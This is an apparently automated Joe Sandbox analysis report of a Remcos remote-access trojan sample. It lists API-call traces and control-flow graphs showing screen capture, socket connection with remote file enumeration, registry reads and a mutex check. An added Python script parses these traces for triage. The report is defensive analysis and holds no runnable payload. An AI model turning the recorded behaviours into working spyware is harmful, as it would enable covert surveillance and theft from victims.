                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                  • Part of subcall function 004090DB: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00419958,00419BC8,00000000), ref: 004090F5
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004146C0), ref: 0040910A
                                                  • Part of subcall function 004090DB: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00409123
                                                  • Part of subcall function 004090DB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040912D
                                                  • Part of subcall function 004090DB: Process32FirstW.KERNEL32(?,?), ref: 00409149
                                                  • Part of subcall function 004090DB: Process32NextW.KERNEL32(?,0000022C), ref: 00409158
                                                  • Part of subcall function 004090DB: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409178
                                                  • Part of subcall function 004090DB: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409187
                                                  • Part of subcall function 004090DB: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409191
                                                  • Part of subcall function 004090DB: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 0040919B
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 004091AF
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091BF
                                                  • Part of subcall function 004090DB: Process32NextW.KERNEL32(?,0000022C), ref: 004091CF
                                                  • Part of subcall function 004090DB: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004091EB
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F4
                                                  • Part of subcall function 004090DB: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409205
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409210
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409219
                                                  • Part of subcall function 004090DB: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409222
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 00408D30
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D66
                                                • ??2@YAPAXI@Z.MSVCRT(00000002,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D73
                                                • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408D89
                                                • CreateThread.KERNEL32(00000000,00000000,0040FC69,)A,00000000,00000000), ref: 00408DA4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00408F14
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@$V01@$??4?$basic_string@$V?$basic_string@$?length@?$basic_string@G@2@@0@$G@1@@Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@$??2@?size@?$basic_string@D@1@@D@2@@0@D@std@@@std@@Process32$?end@?$basic_string@?find@?$basic_string@A?$basic_string@CloseFileModuleMutexNameNextOpenThreadV12@atoifreemallocwcslen$??0?$basic_ofstream@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@AddressD?$basic_ofstream@D@std@@@0@DirectoryErrorExecuteFirstG@2@@0@0@HandleLastLibraryLoadObjectProcQueryShellSingleSnapshotToolhelp32V10@0@V10@@V?$basic_ostream@ValueWaitY?$basic_string@exitwcscmpwcscpy
                                                • String ID: (32 bit)$ (64 bit)$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$licence_code.txt$origmsc$)A$)A
                                                • API String ID: 592530544-3120820120
                                                • Opcode ID: 1cefe9e0a91dd9e1432ac4b01f83a5a4e78eac758390e1c66c81268865004c83
                                                • Instruction ID: b42fcd4e3e42c807c67e9e1877a946166e14785ff057091880b336a728af36a3
                                                • Opcode Fuzzy Hash: 1cefe9e0a91dd9e1432ac4b01f83a5a4e78eac758390e1c66c81268865004c83
                                                • Instruction Fuzzy Hash: 81529171A00245AFDF057BB0AC5AAFE3B69AB40706F0444BEF502A72E1DE794E84875D
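The API listing above records two behaviours worth pulling out of the raw trace rather than reading by eye: the single-instance check at 00408647 (OpenMutexA on Remcos_Mutex_Inj with access 0x00100000, which is SYNCHRONIZE, then WaitForSingleObject with timeout 0x0000EA60 = 60000 ms, then CreateMutexA and GetLastError), and the process walk in subcall 004090DB (GetModuleFileNameW, CreateToolhelp32Snapshot with flags 0x00000002 = TH32CS_SNAPPROCESS, Process32FirstW/Process32NextW, with the string compares between them). The script below is an added example, not Joe Sandbox code and not part of this report: it parses bullets in the format printed above and flags both patterns. The SAMPLE text is constructed from lines copied off this page, and the two find_* functions and their window sizes are this example's own choices. One caveat the parser relies on: the tracer prints stack slots positionally, so tokens past a function's real parameter count (the recurring 0000000E,00413764) are caller-frame contents, not arguments, and only the leading positions are interpreted.

```python
"""Parse Joe Sandbox API-trace bullets and pull out two behaviours recorded
above: the Remcos_Mutex_Inj single-instance check (OpenMutexA -> WaitForSingleObject
-> CreateMutexA) and the Toolhelp32 process walk inside subcall 004090DB.
Added example, not part of the report; SAMPLE is constructed from lines on this page."""
import re
from typing import NamedTuple, Optional

SAMPLE = """\
• OpenMutexA.KERNEL32(00100000,00000000,Remcos_Mutex_Inj), ref: 00408647
• WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00413764), ref: 0040865A
• CloseHandle.KERNEL32()A,?,?,?,?,0000000E,00413764), ref: 00408663
• ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00413764), ref: 00408674
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086CB
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00413764), ref: 004086D1
  • Part of subcall function 0040300F: LoadLibraryA.KERNEL32(ntdll,RtlGetNtVersionNumbers,00419970,00419BC8,00000000,?,?,?,?,?,?,?,?,?,004087DB), ref: 00403022
  • Part of subcall function 004090DB: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00419958,00419BC8,00000000), ref: 004090F5
  • Part of subcall function 004090DB: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040912D
  • Part of subcall function 004090DB: Process32FirstW.KERNEL32(?,?), ref: 00409149
  • Part of subcall function 004090DB: Process32NextW.KERNEL32(?,0000022C), ref: 00409158
• wcslen.MSVCRT ref: 004088DD
"""

class Call(NamedTuple):
    api: str                # exported name as printed (may be a C++ mangled name)
    module: str             # KERNEL32, MSVCP60, ...
    args: tuple             # raw tokens; '?' means the tracer could not resolve the slot
    ref: str                # call-site address
    subcall: Optional[str]  # callee address for "Part of subcall function" lines

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[^.(]+?)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

def hexarg(tok: str) -> Optional[int]:
    """8-digit hex slot -> int; strings and '?' -> None."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None

def parse_trace(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers and metadata lines are not API bullets
        raw = m["args"]
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        calls.append(Call(m["api"], m["mod"].upper(), args, m["ref"].upper(),
                          m["sub"].upper() if m["sub"] else None))
    return calls

def find_mutex_guard(calls: list, window: int = 8) -> Optional[dict]:
    """OpenMutexA(name) followed within `window` calls by WaitForSingleObject(timeout)
    and CreateMutexA: a new instance waits for the old one, then takes the mutex."""
    for i, c in enumerate(calls):
        if c.api != "OpenMutexA" or c.subcall or len(c.args) < 3:
            continue
        timeout, created = None, False
        for later in calls[i + 1:i + 1 + window]:
            if later.api == "WaitForSingleObject" and len(later.args) >= 2:
                timeout = hexarg(later.args[1])      # dwMilliseconds
            elif later.api == "CreateMutexA":
                created = True
        if created:
            return {"mutex": c.args[2], "timeout_ms": timeout, "ref": c.ref}
    return None

def find_process_enum(calls: list) -> Optional[dict]:
    """A CreateToolhelp32Snapshot with TH32CS_SNAPPROCESS (0x2) plus Process32First/Next
    attributed to the same function; also note whether it reads its own image path."""
    by_func: dict = {}
    for c in calls:
        by_func.setdefault(c.subcall or "top", []).append(c)
    for func, seq in by_func.items():
        snap = [c for c in seq if c.api == "CreateToolhelp32Snapshot"]
        walk = [c for c in seq if c.api.startswith(("Process32First", "Process32Next"))]
        if snap and walk and (hexarg(snap[0].args[0]) or 0) & 0x2:
            return {"function": func, "snapshot_ref": snap[0].ref, "walk_calls": len(walk),
                    "reads_own_path": any(c.api == "GetModuleFileNameW" for c in seq)}
    return None

def literal_args(calls: list) -> list:
    """Slots that are neither '?' nor hex: strings the tracer resolved (names, markers)."""
    out = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and hexarg(a) is None and a not in out:
                out.append(a)
    return out

if __name__ == "__main__":
    trace = parse_trace(SAMPLE)
    print("mutex guard:", find_mutex_guard(trace))
    print("process walk:", find_process_enum(trace))
    print("resolved string args:", literal_args(trace))
```

Run against a full export of the APIs section the same functions apply unchanged; the literal_args output is a quick way to collect the mutex name, DLL and export names and marker strings (origmsc, EXEpath, Inj) for a triage note without reading every mangled basic_string call.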

                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041155F
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411576
                                                • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C), ref: 0041158C
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 004115AA
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115B4
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115BD
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115D2
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115DF
                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,6C995E04), ref: 004115F5
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 004115FF
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411608
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411631
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 0041163A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040849C,?), ref: 00411643
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$?length@?$basic_string@V12@$??4?$basic_string@?substr@?$basic_string@V01@V01@@$??0?$basic_string@?find@?$basic_string@D@1@@
                                                • String ID:
                                                • API String ID: 3435050692-0
                                                • Opcode ID: 823909bbf3c1aae78c3434f0519d02c6ffc47d267fe951e889c3075e40b2c626
                                                • Instruction ID: 78a9969333cb22ba367a08e3ec5b5c827793684ccd0837e4e48f6ac12532cdb2
                                                • Opcode Fuzzy Hash: 823909bbf3c1aae78c3434f0519d02c6ffc47d267fe951e889c3075e40b2c626
                                                • Instruction Fuzzy Hash: 65319B7550010EABCF04EFA1DD99CEE7B79FE55306B108169F516E31A0EB34AB09CB68

                                                 Control-flow Graph
                                                 • Graph image not reproduced. Recoverable path for the block at 4128af: __set_app_type, __p__fmode, __p__commode, call 412a3b, then on one branch __setusermatherr, then call 412a26, _initterm, __getmainargs, _initterm, GetStartupInfoA, GetModuleHandleA, call 40845a, exit, _XcptFilter. This is the ordinary MSVC CRT startup sequence; the call to 40845a sits where that stub hands control to the program's own entry function, so that address is where the sample's own logic begins.
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                • String ID:
                                                • API String ID: 801014965-0
                                                • Opcode ID: 6f84974f85084e5c0d59130a57f98c973d1d1ebc6fd8a7326c776f11e2f963a9
                                                • Instruction ID: 69795cd1a6f2df7106d2d63f2792c1373b97bfdac7ef65b590e4ef6b191c87fd
                                                • Opcode Fuzzy Hash: 6f84974f85084e5c0d59130a57f98c973d1d1ebc6fd8a7326c776f11e2f963a9
                                                • Instruction Fuzzy Hash: 08419CB0940308AFDB21DFA8D955AEABBB8FB09710F20412FF851D7291D7B84981CB5C

                                                Control-flow Graph

                                                control_flow_graph 279 40a825-40a84c RegOpenKeyExA 280 40a87b-40a87e 279->280 281 40a84e-40a87a RegQueryValueExA RegCloseKey 279->281
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000001,00408685,00000000,00020019,00408685,?,?,?,00408685,80000001,00000000,?,?,?,?,0000000E), ref: 0040A844
                                                • RegQueryValueExA.KERNELBASE(00408685,?,00000000,80000001,?,00000000,00419BC8,?,?,?,00408685,80000001,00000000), ref: 0040A862
                                                • RegCloseKey.KERNELBASE(00408685,?,?,?,00408685,80000001,00000000,?,?,?,?,0000000E,00413764), ref: 0040A86D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: 65079a657e34e65014708f5f8436535861bd0cd87b08d12a9c0fe70b4f0a8459
                                                • Instruction ID: da08f03aed7bc9e493084d81934a8d7b0b900bd5ee8b69f4dd8cb0e5919d82df
                                                • Opcode Fuzzy Hash: 65079a657e34e65014708f5f8436535861bd0cd87b08d12a9c0fe70b4f0a8459
                                                • Instruction Fuzzy Hash: BBF0F976900218BFDF119F90DD09FDA7FB9EB08760F108165BA05EA190E271DA10AB94

                                                Control-flow Graph

                                                control_flow_graph 783 40f0df-40f12f CreateDCA CreateCompatibleDC GetDeviceCaps * 2 CreateCompatibleBitmap 784 40f131-40f149 DeleteDC * 2 DeleteObject 783->784 785 40f14e-40f15a SelectObject 783->785 786 40f35e-40f36d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z 784->786 787 40f17b-40f198 StretchBlt 785->787 788 40f15c-40f176 DeleteDC * 2 DeleteObject 785->788 789 40f446-40f44d 786->789 790 40f1b9-40f1c2 787->790 791 40f19a-40f1b4 DeleteDC * 2 DeleteObject 787->791 788->786 792 40f1c4-40f1d7 GetCursorInfo 790->792 793 40f20e-40f221 GetObjectA 790->793 791->786 792->793 794 40f1d9-40f1e8 GetIconInfo 792->794 795 40f240-40f24d 793->795 796 40f223-40f23b DeleteDC * 2 DeleteObject 793->796 794->793 797 40f1ea-40f208 DeleteObject * 2 DrawIcon 794->797 798 40f257-40f25d 795->798 799 40f24f-40f252 795->799 796->786 797->793 801 40f267-40f26d 798->801 802 40f25f-40f262 798->802 800 40f312-40f31f 799->800 803 40f285-40f2b8 LocalAlloc 800->803 801->802 804 40f26f-40f275 801->804 802->800 806 40f2c2-40f2ef GlobalAlloc 803->806 807 40f2ba-40f2bf 803->807 804->802 805 40f277-40f27a 804->805 810 40f280-40f283 805->810 811 40f30b 805->811 808 40f2f1-40f309 DeleteDC * 2 DeleteObject 806->808 809 40f324-40f33b GetDIBits 806->809 807->806 808->786 812 40f372-40f440 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z * 2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z DeleteObject GlobalFree DeleteDC * 2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 809->812 813 40f33d-40f35b DeleteDC * 2 DeleteObject GlobalFree 809->813 810->803 811->800 812->789 813->786
                                                APIs
                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040F0F5
                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040F101
                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040F113
                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040F11B
                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040F124
                                                • DeleteDC.GDI32(00000000), ref: 0040F138
                                                • DeleteDC.GDI32(?), ref: 0040F13D
                                                • DeleteObject.GDI32(00000000), ref: 0040F140
                                                • SelectObject.GDI32(?,00000000), ref: 0040F152
                                                • DeleteDC.GDI32(00000000), ref: 0040F163
                                                • DeleteDC.GDI32(?), ref: 0040F168
                                                • DeleteObject.GDI32(?), ref: 0040F16D
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040F367
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040F3A5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040F3B2
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040F3C1
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F3CE
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040F3DA
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F3E7
                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040F3F6
                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040F403
                                                • DeleteObject.GDI32(?), ref: 0040F40C
                                                • GlobalFree.KERNEL32(?), ref: 0040F411
                                                • DeleteDC.GDI32(0040FAAF), ref: 0040F420
                                                • DeleteDC.GDI32(?), ref: 0040F425
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040F42E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F437
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F440
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDevice$BitmapFreeGlobalSelect
                                                • String ID: DISPLAY
                                                • API String ID: 1547359654-865373369
                                                • Opcode ID: e6f52bb77814987d907f30b8aba8f7c2e7e7ea048236d7eec96aba4660ee2b0e
                                                • Instruction ID: 69fc59073b9f6dc180b1a6ec743b06990735fda19b09251324fd81747437f5bc
                                                • Opcode Fuzzy Hash: e6f52bb77814987d907f30b8aba8f7c2e7e7ea048236d7eec96aba4660ee2b0e
                                                • Instruction Fuzzy Hash: 62B1F575900119EFCF20EFA0DC489EEBBB9FF48715B10807AE905A7260DB35AA49DF54

                                                Control-flow Graph

                                                control_flow_graph 814 403ac1-403b0c call 412850 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z socket connect 817 403b12-403b66 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 814->817 818 403f17-403f41 _CxxThrowException ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 4041ea FindClose ExitThread 814->818 823 403b83-403bf0 ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ call 4043bc ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ FindFirstFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 817->823 824 403b68-403b7e _CxxThrowException 817->824 827 403c30-403c42 FindNextFileW 823->827 828 403bf2-403c2b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z call 4023c0 _CxxThrowException 823->828 824->823 830 403e75-403f14 FindClose ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z * 2 call 4023c0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 4041ea 